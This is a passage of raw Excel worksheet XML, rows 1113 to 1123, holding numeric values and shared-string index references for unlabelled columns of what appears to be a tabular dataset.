      <c r="AL1113" t="s">
        <v>707</v>
      </c>
      <c r="AM1113" t="s">
        <v>8387</v>
      </c>
      <c r="AN1113" t="s">
        <v>82</v>
      </c>
      <c r="AO1113">
        <v>2009</v>
      </c>
      <c r="AP1113" t="s">
        <v>8388</v>
      </c>
      <c r="AQ1113" t="s">
        <v>8389</v>
      </c>
      <c r="AR1113" t="s">
        <v>8390</v>
      </c>
      <c r="AS1113" t="s">
        <v>71</v>
      </c>
      <c r="AT1113" t="s">
        <v>86</v>
      </c>
      <c r="AU1113">
        <v>25</v>
      </c>
      <c r="AV1113">
        <v>1</v>
      </c>
      <c r="AW1113">
        <v>86</v>
      </c>
      <c r="AX1113">
        <v>369</v>
      </c>
      <c r="AY1113">
        <v>19</v>
      </c>
      <c r="AZ1113">
        <v>10</v>
      </c>
      <c r="BA1113" t="s">
        <v>16608</v>
      </c>
      <c r="BB1113" t="s">
        <v>15905</v>
      </c>
      <c r="BC1113" t="s">
        <v>9536</v>
      </c>
      <c r="BD1113" t="s">
        <v>12917</v>
      </c>
    </row>
    <row r="1114" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1114">
        <v>5261</v>
      </c>
      <c r="B1114" t="s">
        <v>8391</v>
      </c>
      <c r="C1114" t="s">
        <v>168</v>
      </c>
      <c r="D1114" t="s">
        <v>8392</v>
      </c>
      <c r="E1114" t="s">
        <v>412</v>
      </c>
      <c r="F1114" t="s">
        <v>8393</v>
      </c>
      <c r="G1114" s="1">
        <v>44259</v>
      </c>
      <c r="H1114">
        <v>8492</v>
      </c>
      <c r="I1114">
        <v>8492</v>
      </c>
      <c r="J1114">
        <v>0</v>
      </c>
      <c r="K1114">
        <v>1</v>
      </c>
      <c r="L1114">
        <v>1</v>
      </c>
      <c r="M1114">
        <v>0</v>
      </c>
      <c r="N1114">
        <v>0</v>
      </c>
      <c r="O1114">
        <v>0</v>
      </c>
      <c r="P1114">
        <v>0</v>
      </c>
      <c r="Q1114">
        <v>3</v>
      </c>
      <c r="R1114">
        <v>3</v>
      </c>
      <c r="S1114">
        <v>0</v>
      </c>
      <c r="T1114">
        <v>1</v>
      </c>
      <c r="U1114">
        <v>0</v>
      </c>
      <c r="V1114">
        <v>1500</v>
      </c>
      <c r="W1114">
        <v>1000</v>
      </c>
      <c r="X1114">
        <v>0</v>
      </c>
      <c r="Y1114">
        <v>0</v>
      </c>
      <c r="Z1114">
        <v>0</v>
      </c>
      <c r="AA1114">
        <v>0</v>
      </c>
      <c r="AB1114">
        <v>150</v>
      </c>
      <c r="AC1114">
        <v>300</v>
      </c>
      <c r="AD1114">
        <v>0</v>
      </c>
      <c r="AE1114">
        <v>1000</v>
      </c>
      <c r="AF1114" t="s">
        <v>8394</v>
      </c>
      <c r="AG1114">
        <v>16340</v>
      </c>
      <c r="AH1114">
        <v>13</v>
      </c>
      <c r="AJ1114">
        <v>161</v>
      </c>
      <c r="AK1114" t="s">
        <v>2909</v>
      </c>
      <c r="AL1114" t="s">
        <v>8395</v>
      </c>
      <c r="AM1114" t="s">
        <v>8396</v>
      </c>
      <c r="AN1114" t="s">
        <v>55</v>
      </c>
      <c r="AO1114">
        <v>2013</v>
      </c>
      <c r="AP1114" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1114">
        <v>82334205948</v>
      </c>
      <c r="AR1114" t="s">
        <v>8394</v>
      </c>
      <c r="AS1114" t="s">
        <v>71</v>
      </c>
      <c r="AT1114" t="s">
        <v>58</v>
      </c>
      <c r="AU1114">
        <v>20</v>
      </c>
      <c r="AV1114">
        <v>0</v>
      </c>
      <c r="AW1114">
        <v>3</v>
      </c>
      <c r="AX1114">
        <v>1</v>
      </c>
      <c r="AY1114">
        <v>1</v>
      </c>
      <c r="AZ1114">
        <v>1</v>
      </c>
      <c r="BA1114" t="s">
        <v>17643</v>
      </c>
      <c r="BB1114">
        <v>0</v>
      </c>
      <c r="BC1114" t="s">
        <v>12929</v>
      </c>
      <c r="BD1114" t="s">
        <v>11858</v>
      </c>
    </row>
    <row r="1115" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1115">
        <v>5256</v>
      </c>
      <c r="B1115" t="s">
        <v>8398</v>
      </c>
      <c r="C1115" t="s">
        <v>168</v>
      </c>
      <c r="D1115" t="s">
        <v>8399</v>
      </c>
      <c r="E1115" t="s">
        <v>111</v>
      </c>
      <c r="F1115" t="s">
        <v>8400</v>
      </c>
      <c r="G1115" s="1">
        <v>44285</v>
      </c>
      <c r="H1115">
        <v>8499</v>
      </c>
      <c r="I1115">
        <v>8499</v>
      </c>
      <c r="J1115">
        <v>2</v>
      </c>
      <c r="K1115">
        <v>1</v>
      </c>
      <c r="L1115">
        <v>0</v>
      </c>
      <c r="M1115">
        <v>2</v>
      </c>
      <c r="N1115">
        <v>0</v>
      </c>
      <c r="O1115">
        <v>0</v>
      </c>
      <c r="P1115">
        <v>0</v>
      </c>
      <c r="Q1115">
        <v>6</v>
      </c>
      <c r="R1115">
        <v>3</v>
      </c>
      <c r="S1115">
        <v>0</v>
      </c>
      <c r="T1115">
        <v>1</v>
      </c>
      <c r="U1115">
        <v>1</v>
      </c>
      <c r="V1115">
        <v>80</v>
      </c>
      <c r="W1115">
        <v>0</v>
      </c>
      <c r="X1115">
        <v>1900</v>
      </c>
      <c r="Y1115">
        <v>0</v>
      </c>
      <c r="Z1115">
        <v>0</v>
      </c>
      <c r="AA1115">
        <v>0</v>
      </c>
      <c r="AB1115">
        <v>1800</v>
      </c>
      <c r="AC1115">
        <v>1500</v>
      </c>
      <c r="AD1115">
        <v>0</v>
      </c>
      <c r="AE1115">
        <v>50000</v>
      </c>
      <c r="AF1115" t="s">
        <v>8401</v>
      </c>
      <c r="AG1115">
        <v>17211</v>
      </c>
      <c r="AH1115">
        <v>13</v>
      </c>
      <c r="AJ1115">
        <v>176</v>
      </c>
      <c r="AK1115" t="s">
        <v>5804</v>
      </c>
      <c r="AL1115" t="s">
        <v>5805</v>
      </c>
      <c r="AM1115" t="s">
        <v>8402</v>
      </c>
      <c r="AN1115" t="s">
        <v>82</v>
      </c>
      <c r="AO1115">
        <v>2016</v>
      </c>
      <c r="AP1115" t="s">
        <v>5807</v>
      </c>
      <c r="AQ1115" t="s">
        <v>8403</v>
      </c>
      <c r="AR1115" t="s">
        <v>8401</v>
      </c>
      <c r="AS1115" t="s">
        <v>71</v>
      </c>
      <c r="AT1115" t="s">
        <v>86</v>
      </c>
      <c r="AU1115">
        <v>6</v>
      </c>
      <c r="AV1115">
        <v>2</v>
      </c>
      <c r="AW1115">
        <v>47</v>
      </c>
      <c r="AX1115">
        <v>7</v>
      </c>
      <c r="AY1115">
        <v>3</v>
      </c>
      <c r="AZ1115">
        <v>18</v>
      </c>
      <c r="BA1115" t="s">
        <v>16621</v>
      </c>
      <c r="BB1115" t="s">
        <v>16118</v>
      </c>
      <c r="BC1115" t="s">
        <v>10029</v>
      </c>
      <c r="BD1115">
        <v>0</v>
      </c>
    </row>
    <row r="1116" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1116">
        <v>5195</v>
      </c>
      <c r="B1116" t="s">
        <v>8404</v>
      </c>
      <c r="C1116" t="s">
        <v>3013</v>
      </c>
      <c r="D1116" t="s">
        <v>8405</v>
      </c>
      <c r="E1116" t="s">
        <v>3906</v>
      </c>
      <c r="F1116" t="s">
        <v>8406</v>
      </c>
      <c r="G1116" s="1">
        <v>44224</v>
      </c>
      <c r="H1116">
        <v>8523</v>
      </c>
      <c r="I1116">
        <v>8523</v>
      </c>
      <c r="J1116">
        <v>0</v>
      </c>
      <c r="K1116">
        <v>1</v>
      </c>
      <c r="L1116">
        <v>0</v>
      </c>
      <c r="M1116">
        <v>0</v>
      </c>
      <c r="N1116">
        <v>0</v>
      </c>
      <c r="O1116">
        <v>0</v>
      </c>
      <c r="P1116">
        <v>0</v>
      </c>
      <c r="Q1116">
        <v>1</v>
      </c>
      <c r="R1116">
        <v>10</v>
      </c>
      <c r="S1116">
        <v>0</v>
      </c>
      <c r="T1116">
        <v>1</v>
      </c>
      <c r="U1116">
        <v>0</v>
      </c>
      <c r="V1116">
        <v>500</v>
      </c>
      <c r="W1116">
        <v>0</v>
      </c>
      <c r="X1116">
        <v>0</v>
      </c>
      <c r="Y1116">
        <v>0</v>
      </c>
      <c r="Z1116">
        <v>0</v>
      </c>
      <c r="AA1116">
        <v>0</v>
      </c>
      <c r="AB1116">
        <v>100</v>
      </c>
      <c r="AC1116">
        <v>1000</v>
      </c>
      <c r="AD1116">
        <v>0</v>
      </c>
      <c r="AE1116">
        <v>500</v>
      </c>
      <c r="AF1116" t="s">
        <v>8407</v>
      </c>
      <c r="AG1116">
        <v>28912</v>
      </c>
      <c r="AH1116">
        <v>4</v>
      </c>
      <c r="AJ1116">
        <v>84</v>
      </c>
      <c r="AK1116" t="s">
        <v>7920</v>
      </c>
      <c r="AL1116" t="s">
        <v>8408</v>
      </c>
      <c r="AM1116" t="s">
        <v>8409</v>
      </c>
      <c r="AN1116" t="s">
        <v>68</v>
      </c>
      <c r="AO1116">
        <v>2020</v>
      </c>
      <c r="AP1116">
        <v>82385546560</v>
      </c>
      <c r="AQ1116" t="s">
        <v>8410</v>
      </c>
      <c r="AR1116" t="s">
        <v>8407</v>
      </c>
      <c r="AS1116" t="s">
        <v>71</v>
      </c>
      <c r="AT1116" t="s">
        <v>72</v>
      </c>
      <c r="AU1116">
        <v>14</v>
      </c>
      <c r="AV1116">
        <v>1</v>
      </c>
      <c r="AW1116">
        <v>0</v>
      </c>
      <c r="AX1116">
        <v>0</v>
      </c>
      <c r="AY1116">
        <v>5</v>
      </c>
      <c r="AZ1116">
        <v>1</v>
      </c>
      <c r="BA1116" t="s">
        <v>17620</v>
      </c>
      <c r="BB1116" t="s">
        <v>16107</v>
      </c>
      <c r="BC1116">
        <v>0</v>
      </c>
      <c r="BD1116" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1117" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1117">
        <v>5257</v>
      </c>
      <c r="B1117" t="s">
        <v>8411</v>
      </c>
      <c r="C1117" t="s">
        <v>579</v>
      </c>
      <c r="D1117" t="s">
        <v>8412</v>
      </c>
      <c r="E1117" t="s">
        <v>363</v>
      </c>
      <c r="F1117" t="s">
        <v>364</v>
      </c>
      <c r="G1117" s="1">
        <v>44244</v>
      </c>
      <c r="H1117">
        <v>8563</v>
      </c>
      <c r="I1117">
        <v>8563</v>
      </c>
      <c r="J1117">
        <v>0</v>
      </c>
      <c r="K1117">
        <v>0</v>
      </c>
      <c r="L1117">
        <v>0</v>
      </c>
      <c r="M1117">
        <v>0</v>
      </c>
      <c r="N1117">
        <v>0</v>
      </c>
      <c r="O1117">
        <v>0</v>
      </c>
      <c r="P1117">
        <v>0</v>
      </c>
      <c r="Q1117">
        <v>0</v>
      </c>
      <c r="R1117">
        <v>0</v>
      </c>
      <c r="S1117">
        <v>0</v>
      </c>
      <c r="T1117">
        <v>1</v>
      </c>
      <c r="U1117">
        <v>0</v>
      </c>
      <c r="V1117">
        <v>0</v>
      </c>
      <c r="W1117">
        <v>0</v>
      </c>
      <c r="X1117">
        <v>0</v>
      </c>
      <c r="Y1117">
        <v>0</v>
      </c>
      <c r="Z1117">
        <v>0</v>
      </c>
      <c r="AA1117">
        <v>0</v>
      </c>
      <c r="AB1117">
        <v>0</v>
      </c>
      <c r="AC1117">
        <v>0</v>
      </c>
      <c r="AD1117">
        <v>0</v>
      </c>
      <c r="AE1117">
        <v>10000</v>
      </c>
      <c r="AF1117" t="s">
        <v>8413</v>
      </c>
      <c r="AG1117">
        <v>75123</v>
      </c>
      <c r="AH1117">
        <v>23</v>
      </c>
      <c r="AJ1117">
        <v>364</v>
      </c>
      <c r="AK1117" t="s">
        <v>1278</v>
      </c>
      <c r="AL1117" t="s">
        <v>5414</v>
      </c>
      <c r="AM1117" t="s">
        <v>8414</v>
      </c>
      <c r="AN1117" t="s">
        <v>55</v>
      </c>
      <c r="AO1117">
        <v>2020</v>
      </c>
      <c r="AP1117">
        <v>82115648811</v>
      </c>
      <c r="AQ1117">
        <v>82115648811</v>
      </c>
      <c r="AR1117" t="s">
        <v>8413</v>
      </c>
      <c r="AS1117" t="s">
        <v>371</v>
      </c>
      <c r="AT1117" t="s">
        <v>72</v>
      </c>
      <c r="AU1117">
        <v>0</v>
      </c>
      <c r="AV1117">
        <v>0</v>
      </c>
      <c r="AW1117">
        <v>0</v>
      </c>
      <c r="AX1117">
        <v>0</v>
      </c>
      <c r="AY1117">
        <v>2</v>
      </c>
      <c r="AZ1117">
        <v>2</v>
      </c>
      <c r="BA1117" t="s">
        <v>17639</v>
      </c>
      <c r="BB1117">
        <v>0</v>
      </c>
      <c r="BC1117">
        <v>0</v>
      </c>
      <c r="BD1117" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1118" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1118">
        <v>5254</v>
      </c>
      <c r="B1118" t="s">
        <v>588</v>
      </c>
      <c r="C1118" t="s">
        <v>5506</v>
      </c>
      <c r="D1118" t="s">
        <v>8415</v>
      </c>
      <c r="E1118" t="s">
        <v>142</v>
      </c>
      <c r="F1118" t="s">
        <v>1487</v>
      </c>
      <c r="G1118" s="1">
        <v>44256</v>
      </c>
      <c r="H1118">
        <v>8598</v>
      </c>
      <c r="I1118">
        <v>8598</v>
      </c>
      <c r="J1118">
        <v>3</v>
      </c>
      <c r="K1118">
        <v>1</v>
      </c>
      <c r="L1118">
        <v>3</v>
      </c>
      <c r="M1118">
        <v>0</v>
      </c>
      <c r="N1118">
        <v>0</v>
      </c>
      <c r="O1118">
        <v>0</v>
      </c>
      <c r="P1118">
        <v>0</v>
      </c>
      <c r="Q1118">
        <v>0</v>
      </c>
      <c r="R1118">
        <v>2</v>
      </c>
      <c r="S1118">
        <v>0</v>
      </c>
      <c r="T1118">
        <v>0</v>
      </c>
      <c r="U1118">
        <v>100000</v>
      </c>
      <c r="V1118">
        <v>5000</v>
      </c>
      <c r="W1118">
        <v>10000</v>
      </c>
      <c r="X1118">
        <v>0</v>
      </c>
      <c r="Y1118">
        <v>0</v>
      </c>
      <c r="Z1118">
        <v>0</v>
      </c>
      <c r="AA1118">
        <v>0</v>
      </c>
      <c r="AB1118">
        <v>0</v>
      </c>
      <c r="AC1118">
        <v>5000</v>
      </c>
      <c r="AD1118">
        <v>0</v>
      </c>
      <c r="AE1118">
        <v>0</v>
      </c>
      <c r="AF1118" t="s">
        <v>8416</v>
      </c>
      <c r="AG1118">
        <v>86211</v>
      </c>
      <c r="AH1118">
        <v>19</v>
      </c>
      <c r="AJ1118">
        <v>301</v>
      </c>
      <c r="AK1118" t="s">
        <v>8417</v>
      </c>
      <c r="AL1118" t="s">
        <v>8418</v>
      </c>
      <c r="AM1118" t="s">
        <v>8419</v>
      </c>
      <c r="AN1118" t="s">
        <v>55</v>
      </c>
      <c r="AO1118">
        <v>2009</v>
      </c>
      <c r="AP1118">
        <v>81236046268</v>
      </c>
      <c r="AQ1118" t="s">
        <v>8420</v>
      </c>
      <c r="AR1118" t="s">
        <v>8421</v>
      </c>
      <c r="AS1118" t="s">
        <v>71</v>
      </c>
      <c r="AT1118" t="s">
        <v>58</v>
      </c>
      <c r="AU1118">
        <v>25</v>
      </c>
      <c r="AV1118">
        <v>2</v>
      </c>
      <c r="AW1118">
        <v>0</v>
      </c>
      <c r="AX1118">
        <v>0</v>
      </c>
      <c r="AY1118">
        <v>22</v>
      </c>
      <c r="AZ1118">
        <v>9</v>
      </c>
      <c r="BA1118" t="s">
        <v>17240</v>
      </c>
      <c r="BB1118" t="s">
        <v>16121</v>
      </c>
      <c r="BC1118" t="s">
        <v>12991</v>
      </c>
      <c r="BD1118" t="s">
        <v>11874</v>
      </c>
    </row>
    <row r="1119" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1119">
        <v>5258</v>
      </c>
      <c r="B1119" t="s">
        <v>7012</v>
      </c>
      <c r="C1119" t="s">
        <v>168</v>
      </c>
      <c r="D1119" t="s">
        <v>8422</v>
      </c>
      <c r="E1119" t="s">
        <v>944</v>
      </c>
      <c r="F1119" t="s">
        <v>385</v>
      </c>
      <c r="G1119" s="1">
        <v>44246</v>
      </c>
      <c r="H1119">
        <v>8646</v>
      </c>
      <c r="I1119">
        <v>8646</v>
      </c>
      <c r="J1119">
        <v>1</v>
      </c>
      <c r="K1119">
        <v>3</v>
      </c>
      <c r="L1119">
        <v>0</v>
      </c>
      <c r="M1119">
        <v>1</v>
      </c>
      <c r="N1119">
        <v>0</v>
      </c>
      <c r="O1119">
        <v>0</v>
      </c>
      <c r="P1119">
        <v>8</v>
      </c>
      <c r="Q1119">
        <v>0</v>
      </c>
      <c r="R1119">
        <v>0</v>
      </c>
      <c r="S1119">
        <v>1</v>
      </c>
      <c r="T1119">
        <v>0</v>
      </c>
      <c r="U1119">
        <v>20000</v>
      </c>
      <c r="V1119">
        <v>25000</v>
      </c>
      <c r="W1119">
        <v>0</v>
      </c>
      <c r="X1119">
        <v>697</v>
      </c>
      <c r="Y1119">
        <v>0</v>
      </c>
      <c r="Z1119">
        <v>0</v>
      </c>
      <c r="AA1119">
        <v>7264</v>
      </c>
      <c r="AB1119">
        <v>0</v>
      </c>
      <c r="AC1119">
        <v>0</v>
      </c>
      <c r="AD1119">
        <v>1</v>
      </c>
      <c r="AE1119">
        <v>0</v>
      </c>
      <c r="AF1119" t="s">
        <v>8423</v>
      </c>
      <c r="AG1119">
        <v>45194</v>
      </c>
      <c r="AH1119">
        <v>13</v>
      </c>
      <c r="AJ1119">
        <v>169</v>
      </c>
      <c r="AK1119" t="s">
        <v>5061</v>
      </c>
      <c r="AL1119" t="s">
        <v>8424</v>
      </c>
      <c r="AM1119" t="s">
        <v>8425</v>
      </c>
      <c r="AN1119" t="s">
        <v>55</v>
      </c>
      <c r="AO1119">
        <v>2021</v>
      </c>
      <c r="AP1119" t="s">
        <v>8426</v>
      </c>
      <c r="AQ1119" t="s">
        <v>8427</v>
      </c>
      <c r="AR1119" t="s">
        <v>8428</v>
      </c>
      <c r="AS1119" t="s">
        <v>71</v>
      </c>
      <c r="AT1119" t="s">
        <v>58</v>
      </c>
      <c r="AU1119">
        <v>30</v>
      </c>
      <c r="AV1119">
        <v>3</v>
      </c>
      <c r="AW1119">
        <v>68</v>
      </c>
      <c r="AX1119">
        <v>269</v>
      </c>
      <c r="AY1119">
        <v>0</v>
      </c>
      <c r="AZ1119">
        <v>0</v>
      </c>
      <c r="BA1119" t="s">
        <v>16653</v>
      </c>
      <c r="BB1119" t="s">
        <v>16052</v>
      </c>
      <c r="BC1119">
        <v>0</v>
      </c>
      <c r="BD1119" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1120" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1120">
        <v>5288</v>
      </c>
      <c r="B1120" t="s">
        <v>8429</v>
      </c>
      <c r="C1120" t="s">
        <v>99</v>
      </c>
      <c r="D1120" t="s">
        <v>2320</v>
      </c>
      <c r="E1120" t="s">
        <v>111</v>
      </c>
      <c r="F1120" t="s">
        <v>8430</v>
      </c>
      <c r="G1120" s="1">
        <v>44278</v>
      </c>
      <c r="H1120">
        <v>8663</v>
      </c>
      <c r="I1120">
        <v>8663</v>
      </c>
      <c r="J1120">
        <v>3</v>
      </c>
      <c r="K1120">
        <v>0</v>
      </c>
      <c r="L1120">
        <v>3</v>
      </c>
      <c r="M1120">
        <v>7</v>
      </c>
      <c r="N1120">
        <v>0</v>
      </c>
      <c r="O1120">
        <v>0</v>
      </c>
      <c r="P1120">
        <v>0</v>
      </c>
      <c r="Q1120">
        <v>0</v>
      </c>
      <c r="R1120">
        <v>0</v>
      </c>
      <c r="S1120">
        <v>1</v>
      </c>
      <c r="T1120">
        <v>0</v>
      </c>
      <c r="U1120">
        <v>1100000</v>
      </c>
      <c r="V1120">
        <v>0</v>
      </c>
      <c r="W1120">
        <v>15000</v>
      </c>
      <c r="X1120">
        <v>7000</v>
      </c>
      <c r="Y1120">
        <v>0</v>
      </c>
      <c r="Z1120">
        <v>0</v>
      </c>
      <c r="AA1120">
        <v>0</v>
      </c>
      <c r="AB1120">
        <v>0</v>
      </c>
      <c r="AC1120">
        <v>0</v>
      </c>
      <c r="AD1120">
        <v>1</v>
      </c>
      <c r="AE1120">
        <v>0</v>
      </c>
      <c r="AF1120" t="s">
        <v>8431</v>
      </c>
      <c r="AG1120">
        <v>14450</v>
      </c>
      <c r="AH1120">
        <v>12</v>
      </c>
      <c r="AJ1120">
        <v>160</v>
      </c>
      <c r="AK1120" t="s">
        <v>114</v>
      </c>
      <c r="AL1120" t="s">
        <v>115</v>
      </c>
      <c r="AM1120" t="s">
        <v>8432</v>
      </c>
      <c r="AN1120" t="s">
        <v>55</v>
      </c>
      <c r="AO1120">
        <v>2008</v>
      </c>
      <c r="AP1120" t="s">
        <v>8433</v>
      </c>
      <c r="AQ1120">
        <v>85899554760</v>
      </c>
      <c r="AR1120" t="s">
        <v>8434</v>
      </c>
      <c r="AS1120" t="s">
        <v>71</v>
      </c>
      <c r="AT1120" t="s">
        <v>58</v>
      </c>
      <c r="AU1120">
        <v>0</v>
      </c>
      <c r="AV1120">
        <v>0</v>
      </c>
      <c r="AW1120">
        <v>59</v>
      </c>
      <c r="AX1120">
        <v>57</v>
      </c>
      <c r="AY1120">
        <v>15</v>
      </c>
      <c r="AZ1120">
        <v>8</v>
      </c>
      <c r="BA1120" t="s">
        <v>16601</v>
      </c>
      <c r="BB1120" t="s">
        <v>16124</v>
      </c>
      <c r="BC1120">
        <v>0</v>
      </c>
      <c r="BD1120" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="1121" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1121">
        <v>5039</v>
      </c>
      <c r="B1121" t="s">
        <v>8435</v>
      </c>
      <c r="C1121" t="s">
        <v>157</v>
      </c>
      <c r="D1121" t="s">
        <v>8436</v>
      </c>
      <c r="E1121" t="s">
        <v>111</v>
      </c>
      <c r="F1121" t="s">
        <v>8437</v>
      </c>
      <c r="G1121" s="1">
        <v>44281</v>
      </c>
      <c r="H1121">
        <v>8694</v>
      </c>
      <c r="I1121">
        <v>8694</v>
      </c>
      <c r="J1121">
        <v>1</v>
      </c>
      <c r="K1121">
        <v>4</v>
      </c>
      <c r="L1121">
        <v>1</v>
      </c>
      <c r="M1121">
        <v>0</v>
      </c>
      <c r="N1121">
        <v>0</v>
      </c>
      <c r="O1121">
        <v>0</v>
      </c>
      <c r="P1121">
        <v>0</v>
      </c>
      <c r="Q1121">
        <v>1</v>
      </c>
      <c r="R1121">
        <v>2</v>
      </c>
      <c r="S1121">
        <v>0</v>
      </c>
      <c r="T1121">
        <v>1</v>
      </c>
      <c r="U1121">
        <v>375</v>
      </c>
      <c r="V1121">
        <v>200</v>
      </c>
      <c r="W1121">
        <v>375</v>
      </c>
      <c r="X1121">
        <v>0</v>
      </c>
      <c r="Y1121">
        <v>0</v>
      </c>
      <c r="Z1121">
        <v>0</v>
      </c>
      <c r="AA1121">
        <v>0</v>
      </c>
      <c r="AB1121">
        <v>2000</v>
      </c>
      <c r="AC1121">
        <v>200</v>
      </c>
      <c r="AD1121">
        <v>0</v>
      </c>
      <c r="AE1121">
        <v>400</v>
      </c>
      <c r="AF1121" t="s">
        <v>8438</v>
      </c>
      <c r="AG1121">
        <v>67153</v>
      </c>
      <c r="AH1121">
        <v>16</v>
      </c>
      <c r="AJ1121">
        <v>241</v>
      </c>
      <c r="AK1121" t="s">
        <v>8439</v>
      </c>
      <c r="AL1121" t="s">
        <v>8440</v>
      </c>
      <c r="AM1121" t="s">
        <v>8441</v>
      </c>
      <c r="AN1121" t="s">
        <v>68</v>
      </c>
      <c r="AO1121">
        <v>2020</v>
      </c>
      <c r="AP1121">
        <v>8113737577</v>
      </c>
      <c r="AQ1121" t="s">
        <v>8442</v>
      </c>
      <c r="AR1121" t="s">
        <v>8443</v>
      </c>
      <c r="AS1121" t="s">
        <v>71</v>
      </c>
      <c r="AT1121" t="s">
        <v>72</v>
      </c>
      <c r="AU1121">
        <v>26</v>
      </c>
      <c r="AV1121">
        <v>1</v>
      </c>
      <c r="AW1121">
        <v>2</v>
      </c>
      <c r="AX1121">
        <v>1</v>
      </c>
      <c r="AY1121">
        <v>5</v>
      </c>
      <c r="AZ1121">
        <v>2</v>
      </c>
      <c r="BA1121" t="s">
        <v>17549</v>
      </c>
      <c r="BB1121">
        <v>0</v>
      </c>
      <c r="BC1121" t="s">
        <v>13000</v>
      </c>
      <c r="BD1121">
        <v>0</v>
      </c>
    </row>
    <row r="1122" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1122">
        <v>5281</v>
      </c>
      <c r="B1122" t="s">
        <v>8444</v>
      </c>
      <c r="C1122" t="s">
        <v>458</v>
      </c>
      <c r="D1122" t="s">
        <v>8445</v>
      </c>
      <c r="E1122" t="s">
        <v>843</v>
      </c>
      <c r="F1122" t="s">
        <v>5523</v>
      </c>
      <c r="G1122" s="1">
        <v>44309</v>
      </c>
      <c r="H1122">
        <v>8700</v>
      </c>
      <c r="I1122">
        <v>8700</v>
      </c>
      <c r="J1122">
        <v>0</v>
      </c>
      <c r="K1122">
        <v>0</v>
      </c>
      <c r="L1122">
        <v>0</v>
      </c>
      <c r="M1122">
        <v>0</v>
      </c>
      <c r="N1122">
        <v>0</v>
      </c>
      <c r="O1122">
        <v>0</v>
      </c>
      <c r="P1122">
        <v>0</v>
      </c>
      <c r="Q1122">
        <v>1</v>
      </c>
      <c r="R1122">
        <v>1</v>
      </c>
      <c r="S1122">
        <v>0</v>
      </c>
      <c r="T1122">
        <v>1</v>
      </c>
      <c r="U1122">
        <v>0</v>
      </c>
      <c r="V1122">
        <v>0</v>
      </c>
      <c r="W1122">
        <v>0</v>
      </c>
      <c r="X1122">
        <v>0</v>
      </c>
      <c r="Y1122">
        <v>0</v>
      </c>
      <c r="Z1122">
        <v>0</v>
      </c>
      <c r="AA1122">
        <v>0</v>
      </c>
      <c r="AB1122">
        <v>100</v>
      </c>
      <c r="AC1122">
        <v>1000</v>
      </c>
      <c r="AD1122">
        <v>0</v>
      </c>
      <c r="AE1122">
        <v>5000</v>
      </c>
      <c r="AF1122" t="s">
        <v>8446</v>
      </c>
      <c r="AG1122">
        <v>29151</v>
      </c>
      <c r="AH1122">
        <v>5</v>
      </c>
      <c r="AJ1122">
        <v>149</v>
      </c>
      <c r="AK1122" t="s">
        <v>1355</v>
      </c>
      <c r="AL1122" t="s">
        <v>8447</v>
      </c>
      <c r="AM1122" t="s">
        <v>8448</v>
      </c>
      <c r="AN1122" t="s">
        <v>68</v>
      </c>
      <c r="AO1122">
        <v>2011</v>
      </c>
      <c r="AP1122">
        <v>811704545</v>
      </c>
      <c r="AQ1122" t="s">
        <v>8449</v>
      </c>
      <c r="AR1122" t="s">
        <v>8446</v>
      </c>
      <c r="AS1122" t="s">
        <v>71</v>
      </c>
      <c r="AT1122" t="s">
        <v>72</v>
      </c>
      <c r="AU1122">
        <v>24</v>
      </c>
      <c r="AV1122">
        <v>1</v>
      </c>
      <c r="AW1122">
        <v>4</v>
      </c>
      <c r="AX1122">
        <v>0</v>
      </c>
      <c r="AY1122">
        <v>3</v>
      </c>
      <c r="AZ1122">
        <v>1</v>
      </c>
      <c r="BA1122" t="s">
        <v>17650</v>
      </c>
      <c r="BB1122">
        <v>0</v>
      </c>
      <c r="BC1122" t="s">
        <v>9638</v>
      </c>
      <c r="BD1122" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1123" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1123">
        <v>5291</v>
      </c>
      <c r="B1123" t="s">
        <v>8450</v>
      </c>
      <c r="C1123" t="s">
        <v>47</v>
      </c>
      <c r="D1123" t="s">
        <v>8451</v>
      </c>
      <c r="E1123" t="s">
        <v>142</v>
      </c>
      <c r="F1123" t="s">
        <v>8452</v>
      </c>
      <c r="G1123" s="1">
        <v>44312</v>
      </c>
      <c r="H1123">
        <v>8725</v>
      </c>
      <c r="I1123">
        <v>8725</v>
      </c>
      <c r="J1123">
        <v>1</v>
      </c>
      <c r="K1123">
        <v>0</v>
      </c>
      <c r="L1123">
        <v>2</v>
      </c>
      <c r="M1123">
        <v>3</v>
      </c>
      <c r="N1123">
        <v>0</v>
      </c>
      <c r="O1123">
        <v>0</v>
      </c>
      <c r="P1123">
        <v>0</v>
      </c>
      <c r="Q1123">
        <v>0</v>
      </c>
      <c r="R1123">
        <v>0</v>
      </c>
      <c r="S1123">
        <v>0</v>
      </c>
      <c r="T1123">
        <v>0</v>
      </c>
      <c r="U1123">
        <v>50000</v>
      </c>
      <c r="V1123">
        <v>0</v>
      </c>
      <c r="W1123">
        <v>20000</v>
      </c>
      <c r="X1123">
        <v>10000</v>
      </c>
      <c r="Y1123">
        <v>0</v>
      </c>
      <c r="Z1123">
        <v>0</v>
      </c>
      <c r="AA1123">
        <v>0</v>
      </c>
      <c r="AB1123">
        <v>0</v>
      </c>
      <c r="AC1123">
        <v>0</v>
      </c>
      <c r="AD1123">
        <v>0</v>
      </c>
      <c r="AE1123">
        <v>0</v>
      </c>
      <c r="AF1123" t="s">
        <v>8453</v>
      </c>
      <c r="AG1123">
        <v>20414</v>
      </c>
      <c r="AH1123">
        <v>2</v>
      </c>
      <c r="AJ1123">
        <v>35</v>
      </c>
      <c r="AK1123" t="s">
        <v>2220</v>
      </c>
      <c r="AL1123" t="s">
        <v>2221</v>
      </c>
      <c r="AM1123" t="s">
        <v>8454</v>
      </c>
      <c r="AN1123" t="s">
        <v>55</v>
      </c>
      <c r="AO1123">
        <v>2016</v>
      </c>
      <c r="AP1123" t="s">
